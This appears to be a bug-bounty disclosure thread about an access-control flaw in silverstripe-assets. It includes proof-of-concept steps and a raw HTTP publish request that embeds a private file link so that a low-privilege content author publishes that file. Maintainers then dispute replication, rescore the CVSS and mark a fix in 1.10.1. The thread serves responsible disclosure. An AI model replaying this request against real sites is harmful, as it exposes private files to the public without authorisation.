unprivileged user can publish a private file in silverstripe/silverstripe-assets
Reported on
Mar 27th 2022
Description
user who dont have any accesss in file can publish the file and then unauthenticated user can download that file
Proof of Concept
1. From admin account add a new user called user-B as content Authors .
Now give user-B permission in page section only .Dont give files permission .
So, user-B should not access files .
2. Now from admin account goto http://localhost/silverstripe/admin/assets/ and upload a file . dont publish this file .
user-B should not access this file .
lets the file id is 23 .
3. Now goto user-B account and edit any page and attach a file to this page and publish that page .
Here bellow request is sent to server
POST /silverstripe/admin/pages/edit/EditForm/7/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Pjax: CurrentForm,Breadcrumbs
X-Requested-With: XMLHttpRequest
Content-Length: 1925
Origin: http://193.37.215.120
Connection: close
Referer: http://localhost/silverstripe/admin/pages/edit/show/7
Cookie:
Title=admin-pageNew+Page&URLSegment=admin-pagenew-page&MenuTitle=admin-pageNew+Page&Content=<p><a href="[file_link,id=23]">sd</a><a>mjkhkh</a></p><p>&MetaDescription=&ExtraMeta=&ClassName=Page&ParentID=0&SecurityID=2a6bce172bfb6110234a0460ffecd38ba1bf0ec3&ID=7&AbsoluteLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F&LiveLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DLive&StageLink=http%3A%2F%2F193.37.215.120%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DStage&ArchiveWarningMessage=Warning%3A+This+page+and+all+of+its+child+pages+will+be+unpublished+before+being+sent+to+the+archive.%5Cn%5CnAre+you+sure+you+want+to+proceed%3F&TreeTitle=%3Cspan+class%3D%22jstree-pageicon+page-icon+font-icon-page+class-Page%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22item%22+data-allowedchildren%3D%22%5B%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-page%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CErrorPage%5C%5CErrorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BError+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-error%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CRedirectorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BRedirector+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-redirect%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CVirtualPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BVirtual+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-virtual%26quot%3B%7D%5D%22%3Eadmin-pageNew+Page%3C%2Fspan%3E&Action=split&action_publish=1&BackURL=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin%2Fpages%2Fedit%2Fshow%2F7
Here in this request just check the Content parameter value <p><a href="[file_link,id=23]">sd</a><a>mjkhkh</a></p><p> . here user-B attached a file which id is 23 .
After publish the page , above file is also published by user-B .
As user-B dont have permission in files section but still can publish that file using above request by attaching file to a page .
4. Now any external unauthenticated user visit above page will see the file link and can download the file using url like https://localhost/silverstripe/assets/extention_brute.txt .
So, user-B can publish a file even when he does not have permission in files .
Impact
unprivileged user can publish a file when he does not have permission in files .
Impact
publish a private file
Thanks for submitting this, we have replicated the issue at our end
I wasn't able to fully replicate publishing files, though there was an issue where protected images were viewable to users who should not have been able to see them
Could you please confirm if you'd liked to be acknowledged in the official disclosure? Would crediting you as follows be OK?
ranjit-git via huntr.dev
Regards Steve Boyd Silverstripe Product Developer
We are still having internal discussions about this one as we have not fully replicated the original issue
Regards Steve Boyd Silverstripe Product Developer
On the video you provided, user11 / bug@localhost.com has the permission "Edit any file" - this essentially means they do have enough permissions to view and publish protected files. Therefore the issue as originally reported where unprivileged users can published protected files isn't accurate.
While investigating this issue though, there was a related issue uncovered where protected images (not files like pdfs though) are able to have be viewed in the CMS to users that shouldn't have permission to view them by sending a XHR request as described. They still cannot publish them to the public asset store though. We have developed a fix internally for this which should be released in a month or two.
We've internally assessed the CVE for this at 3.9, so I'll change the the assessment on this issue accordingly
Regards Steve Boyd Silverstripe Product Developer
Sorry by CVE for this at 3.9 I meant we assessed the CVSS as a 3.9.
Regards Steve Boyd Silverstripe Product Developer
This isn't letting me change the severity from 7.1 (high) to 3.9 (low) - could you please do this for me? I'm happy to confirm this once that's done
Regards Steve Boyd Silverstripe Product Developer
@maintainer
On the video you provided, user11 / bug@localhost.com has the permission "Edit any file" - this essentially means they do have enough permissions to view and publish protected files.
Sorry i made mistake in that video .
user11/bug@localhost.com does not need Edit any File file .
i forgot to revoke that permission from user11 .
You can revoke that permission and still this bug is produceble .
can you plz recalculate the CVSS score .
If severity remain same then i will change severity to your provided cvss score
so, user11@bug@localhost.com does not have Files section and Edit any file permission .
Now user-B fully unprivileged to publish a file but using this bug he can publish
here is the correct video poc
https://drive.google.com/file/d/1pm_qb-pa_2mrm432SrjXSH5LCDLjygEu/view?usp=sharing
@maintainer sorry about the inability to assess the CVSS manually, we will deliver this functionality very soon.
In the meantime can you please tell us what vectors you used that led to a CVSS of 3.1? We will adjust it from our end :)
@ranjit-git - the new video posted is literally just an admin user publishing a file with no special permissions on it.
@pavlos - https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C&version=3.1
Regards Steve Boyd Silverstripe Product Developer
@maintainer I think you did not watched the video carefully. In this video user11 is content-author . I think you might have confused as I recorded the video in same browser. Acttuttly in my firefox browser I uses two account. One for admin in normal mode. Another one is content author in container-1. You might have assumed both account as same
Even you can reproduce the bug yourself . Create a user with content-author permision and then revoke file section permission and revoke edit-any-file permiision. And this user can publish file using this bug .
Just give me another chance I will properly make a video with written. Within hour I will upload a video
VIDEO POC
https://drive.google.com/file/d/1uiMYZYq1XOquuWQLivLUV2a-KMS_1yzx/view
my steps
- admin add a user in content-author group .
- revoke bellow permission for content-author group File section permission and Edit-Any-File permiision
- goto content-author user account and publish the file like in my video
Plz let me know your file decision and final CVSS score .
@maintainer i have adjusted your provided cvss score https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C&version=3.1 Plz lt me know if any issue
@Pavlos
I'd like to mark as fixed, though the fix is in silverstripe/assets, not silverstripe/framework
Fixed in version: 1.10.1
SHA: 5f6a73b010c01587ffbfb954441f6b7cbb54e767
Who should get rewarded for the patch: Nobody
